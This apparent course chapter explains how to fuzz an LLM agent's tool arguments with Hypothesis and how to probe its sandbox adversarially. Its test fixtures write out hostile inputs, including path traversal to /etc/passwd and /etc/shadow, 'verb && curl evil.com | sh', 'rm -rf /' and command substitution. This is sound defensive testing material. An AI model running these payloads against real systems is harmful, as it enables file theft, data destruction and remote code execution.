04 - Fuzzing tool args and reviewing the sandbox
The fuzzer does not think like an attacker; it generates random inputs and lets the system fail. Combined with a sandbox (Phase 32) that limits what the tools can do, the two layers complement each other: the fuzzer finds unexpected inputs, and the sandbox limits the damage when one slips through.
Why fuzz when you have schemas
Phase 31 defines tool argument schemas (JSON Schema / Pydantic). Phase 30 enforces output schemas. Both are whitelists of valid shapes. So why fuzz?
- Schemas describe shape, not semantics. A `path: str` field passes the schema as `"../../../etc/passwd"`. A `verb: str` field passes as `"work; rm -rf /"`. The schema is satisfied; the behavior is not.
- Schemas are written by humans. Humans miss edge cases: Unicode normalization, NULL bytes, very long strings, integer overflow, empty strings.
- Fuzz finds violations the writer didn't think of. That's the whole point.
The fuzzer is downstream of the schema: it generates inputs that pass schema validation but might still violate behavior expectations.
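The gap between shape and semantics can be shown in a few lines. This is a minimal sketch that uses a hand-rolled type check as a stand-in for JSON Schema or Pydantic; `TOOL_ARG_SCHEMA`, `validate_shape`, and the sample file name are illustrative names, not part of the project.

```python
# Hypothetical stand-in for a JSON Schema / Pydantic model: field name -> type.
TOOL_ARG_SCHEMA = {"path": str, "verb": str}


def validate_shape(args: dict) -> bool:
    """Return True when args has exactly the declared fields with the declared types."""
    if set(args) != set(TOOL_ARG_SCHEMA):
        return False
    return all(isinstance(args[name], typ) for name, typ in TOOL_ARG_SCHEMA.items())


benign = {"path": "present-simple.md", "verb": "work"}
hostile = {"path": "../../../etc/passwd", "verb": "work; rm -rf /"}

# Both payloads have the right shape, so a shape-only check accepts both.
print(validate_shape(benign))   # True
print(validate_shape(hostile))  # True
print(validate_shape({"path": 42, "verb": "work"}))  # False: wrong type
```

Only the third payload is rejected. The hostile one is exactly the kind of input the fuzzer is meant to push past the schema and into the tool.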
Hypothesis: property-based testing as fuzzing
`hypothesis` is the standard Python library for property-based testing. It shrinks inputs to minimal failing examples, which makes findings actionable.
Basic shape for the grammar tutor:
```python
from hypothesis import given, strategies as st

# `agent` and `no_path_escape` come from the project under test; they are not defined here.


@given(
    verb=st.text(min_size=1, max_size=50),
    tense=st.sampled_from(["infinitive", "present_simple", "past_simple",
                           "past_participle", "future_will", "future_going_to"]),
    person=st.sampled_from(["1sg", "2sg", "3sg"]),
)
def test_agent_tool_args_are_safe(verb, tense, person):
    result = agent.invoke({"verb": verb, "tense": tense, "person": person})
    assert result.status in {"ok", "rejected"}
    assert "rm -rf" not in result.diagnostic  # no command leakage
    assert no_path_escape(result)  # no fs access outside KB
```
What Hypothesis does:
- Generates random `verb` strings from the `text()` strategy, including Unicode, control characters, and strings up to the `max_size` cap (50 here; raise it to exercise very long inputs).
- Runs the test. If it fails, shrinks the input: tries to find the smallest `verb` that still fails.
- Persists the failing example to `.hypothesis/examples/` so the same failure is retried on every run.
The result of a 60-second fuzz run is, ideally, at least one failing example — confirming the agent has at least one corner case its schema didn't catch.
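To make "shrinking" concrete, here is a toy shrinker in plain Python. It is not Hypothesis's actual algorithm, which is considerably more sophisticated; it is only a sketch of the idea of reducing a failing input while the failure persists. The `shrink` and `tool_misbehaves` names, and the semicolon bug, are invented for illustration.

```python
from typing import Callable


def shrink(failing: str, still_fails: Callable[[str], bool]) -> str:
    """Greedily delete one character at a time while the input keeps failing."""
    current = failing
    progress = True
    while progress:
        progress = False
        for i in range(len(current)):
            candidate = current[:i] + current[i + 1:]
            if still_fails(candidate):
                current = candidate
                progress = True
                break  # restart the scan on the shorter string
    return current


def tool_misbehaves(verb: str) -> bool:
    # Hypothetical bug: the tool chokes on any verb containing a semicolon.
    return ";" in verb


print(repr(shrink("work; rm -rf /", tool_misbehaves)))  # ';'
```

The 14-character payload reduces to a single `;`, which points at the cause far more directly than the original string does.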
Strategies tailored to the threat model
Generic strategies (st.text()) find some issues. Targeted strategies find more:
```python
from hypothesis import strategies as st

malicious_paths = st.sampled_from([
    "../../../etc/passwd",
    "..\\..\\..\\windows\\system32\\config\\sam",
    "/dev/null",
    "/etc/shadow",
    "file:///etc/passwd",
    "\\\\server\\share",
])
command_injection = st.sampled_from([
    "verb; rm -rf /",
    "verb && curl evil.com | sh",
    "$(whoami)",
    "`id`",
    "verb\nmalicious",
])

# Mix the adversarial fixtures with generic text (the variable name is illustrative).
adversarial_verb = st.one_of(malicious_paths, command_injection, st.text())
```
These are adversarial fixtures mixed into the generation pool. The fuzzer becomes part property-based, part dictionary-driven.
What "schema violation" means here
The Phase 37 DoD requires the fuzzer to find ≥1 schema violation in 60 seconds. "Schema violation" means:
- The agent's tool response doesn't match its declared output schema (Phase 30).
- The agent raises an unexpected exception (not `ValidationError`, not `ToolRejected`).
- The agent's response contains a string that looks like leakage from a tool error (e.g., a filesystem path the user couldn't have known).
The fuzzer doesn't need to produce a security incident — it needs to produce a behavioral surprise. Surprises are the leading indicator of latent vulnerabilities.
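The three criteria can be folded into one triage helper that the fuzz test calls on every outcome. This is a sketch under assumptions: `ToolResult`, `classify`, and `LEAK_PATTERN` are hypothetical, the two exception classes are local stand-ins for the project's own, and the leak regex is only one plausible definition of "a path the user couldn't have known".

```python
import re
from dataclasses import dataclass
from typing import Optional


class ValidationError(Exception):
    """Stand-in for the expected schema-rejection error."""


class ToolRejected(Exception):
    """Stand-in for the expected tool-level rejection."""


@dataclass
class ToolResult:
    # Hypothetical result shape, modelled on the fields used in the test above.
    status: str
    diagnostic: str


# Assumption: absolute POSIX system paths or Windows drive paths count as leakage.
LEAK_PATTERN = re.compile(r"(/(home|etc|usr|var|tmp)/\S+|[A-Za-z]:\\\S+)")


def classify(result: Optional[ToolResult],
             error: Optional[BaseException]) -> Optional[str]:
    """Return a violation label, or None when the outcome is an expected one."""
    if error is not None:
        if isinstance(error, (ValidationError, ToolRejected)):
            return None  # expected rejection, not a finding
        return "unexpected-exception"
    if result is None or result.status not in {"ok", "rejected"}:
        return "output-schema-mismatch"
    if LEAK_PATTERN.search(result.diagnostic):
        return "error-leakage"
    return None
```

A fuzz test can then assert `classify(result, error) is None`, and the label on a failure says which of the three criteria was hit.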
The Phase 32 sandbox: what we're reviewing
Phase 32 wraps tool execution in a capability-restricted environment:
| Capability | Granted? | Mechanism |
|---|---|---|
| Filesystem read, `data/kb/grammar-rules/` | Yes | Path canonicalization + prefix check |
| Filesystem read, anywhere else | No | Same check rejects |
| Filesystem write | No | Tools have no write APIs |
| Network access | No | No `requests`/`httpx` imports allowed in tool code |
| Subprocess spawn | No | `subprocess`, `os.system`, `os.popen` blocked by audit hook |
| Arbitrary Python eval | No | No `eval`, `exec`, `compile` in tool code |
| CPU time | Limited | `signal.SIGXCPU` after 5 seconds of CPU time |
| Memory | Limited | `resource.setrlimit(RLIMIT_AS, ...)` |
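The "path canonicalization + prefix check" mechanism in the first two rows could look roughly like the following. This is a sketch, not Phase 32's actual code: `KB_ROOT` and `is_inside_kb` are assumed names, and the real sandbox may differ in how it resolves the root.

```python
import os

# Assumed KB root, taken from the table; adjust to the real project layout.
KB_ROOT = os.path.realpath("data/kb/grammar-rules")


def is_inside_kb(user_path: str, root: str = KB_ROOT) -> bool:
    """Canonicalize first, then compare against the allowed root."""
    try:
        # realpath collapses ".." segments and resolves symlinks before the check.
        candidate = os.path.realpath(os.path.join(root, user_path))
        # commonpath compares whole components, so a sibling directory such as
        # "grammar-rules-evil" does not pass as it would with str.startswith.
        return os.path.commonpath([candidate, root]) == root
    except ValueError:
        # Raised for embedded NUL bytes or, on Windows, paths on another drive.
        return False
```

Comparing path components rather than raw string prefixes is the design choice that matters here: a plain `startswith` check would accept `data/kb/grammar-rules-evil/`.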
Phase 37's job is not to build this sandbox (Phase 32 already did) but to test it adversarially:
- Try path traversal: does canonicalization actually canonicalize?
- Try CPU exhaustion: does the timeout fire?
- Try memory exhaustion: does the rlimit hold?
- Try shell metacharacters: do they reach a shell? (They shouldn't; there's no `shell=True` anywhere.)
- Try side channels: DNS resolution, timing oracles.
Each test that the sandbox passes gets a regression entry. Each test it fails becomes the lead story of the report.
Sandbox bypass categories to test
From the literature on sandboxing, the categories most often missed:
- TOCTOU (time-of-check, time-of-use). Path is canonicalized at check time; an attacker swaps a symlink before use. Hard to exploit in this single-process setup but worth a test.
- Encoding tricks. UTF-8 normalization, URL-encoding, double-encoding. `..%2f..%2f` vs `../..`. The canonicalizer must normalize before the prefix check.
- Case folding. Windows-style case-insensitive filesystems: `DATA/KB/...` vs `data/kb/...`. (Less relevant on Borja's Fedora box but worth a one-line test.)
- Resource exhaustion as DoS. Even if no escape, can a tool argument cause a 30-minute hang? The 5-second timeout should catch this.
- Error-message leakage. A failed tool call returns an error string. If that string contains `/home/borja/.../secrets`, the sandbox failed to redact.
`lab/03-tool-abuse-and-fuzz.md` walks through each category as a concrete test.
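The "normalize before the prefix check" rule from the encoding-tricks item can be sketched as a decode-to-fixpoint loop. This is one possible approach under stated assumptions, not the project's canonicalizer: `normalize_path_arg` and the `max_rounds` limit are hypothetical, and rejecting deeply nested encodings outright is a policy choice.

```python
import unicodedata
from urllib.parse import unquote


def normalize_path_arg(raw: str, max_rounds: int = 5) -> str:
    """Strip percent-encoding layers and Unicode compatibility forms until stable."""
    current = raw
    for _ in range(max_rounds):
        # NFKC folds look-alikes such as fullwidth '.' and '/' into ASCII.
        decoded = unicodedata.normalize("NFKC", unquote(current))
        if decoded == current:
            return current  # fixpoint reached: nothing left to decode
        current = decoded
    # No fixpoint within max_rounds: treat the input as hostile rather than guess.
    raise ValueError("too many encoding layers")


print(normalize_path_arg("..%2f..%2fetc"))    # ../../etc
print(normalize_path_arg("..%252f..%252f"))   # ../../
```

Running the prefix check on the output of this function, rather than on the raw argument, is what closes the double-encoding gap: the check and the eventual file open then see the same string.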
What the sandbox does not protect against
A blunt list:
- Logical bugs in the agent itself. If the agent's tool routing has a bug that calls the wrong tool with the wrong args, the sandbox doesn't help.
- Information that the tool is supposed to return. A KB lookup tool returns KB content; if a poisoned chunk is in the KB (Lab 01), the sandbox lets it through because it's a legitimate read.
- Compromise of the sandbox itself. If `signal.SIGXCPU` is monkey-patched by attacker code that already runs in-process, the timeout is moot. The sandbox assumes the agent code path is trusted; only tool arguments are untrusted.
- The model. The sandbox wraps tools, not the LLM forward pass. A model that hallucinates a malicious response is a separate problem (Phase 30 schema enforcement).
This list belongs in the THREATS.md rows Borja writes during phase execution: the sandbox's coverage and its gaps both need documentation.
The two-layer story
Putting the four theory chapters together:
1. Boundary layer: schemas (Phase 30) define what's allowed in/out.
2. Sandbox layer: capability restrictions (Phase 32) limit blast radius if boundary fails.
3. Audit layer: redacted logs (Phase 34) catch the attempt without storing the payload.
4. Tripwire layer: `MANIFEST.json` verification (Phase 37 lab 04) catches tampering.
Fuzzing exercises layer 1 and probes layer 2. It does not test layer 3 or 4 — those need their own checks.
One-paragraph recap
Schemas describe shape; fuzzers find shape-passing inputs that nonetheless misbehave. `hypothesis` plus a small dictionary of malicious payloads is the cheapest, highest-yield testing tool in the phase. The Phase 32 sandbox is the layer that limits the damage when the fuzzer's findings escape the schema; Phase 37's job is to probe the sandbox adversarially, not to build it. The DoD's "≥1 schema violation in 60 seconds" is set deliberately low: even a carefully designed schema has corner cases, and not finding one in 60 seconds is itself a finding worth investigating.
Next: lab/00-prompt-injection-direct.md — the "pirate" payload and its mitigation.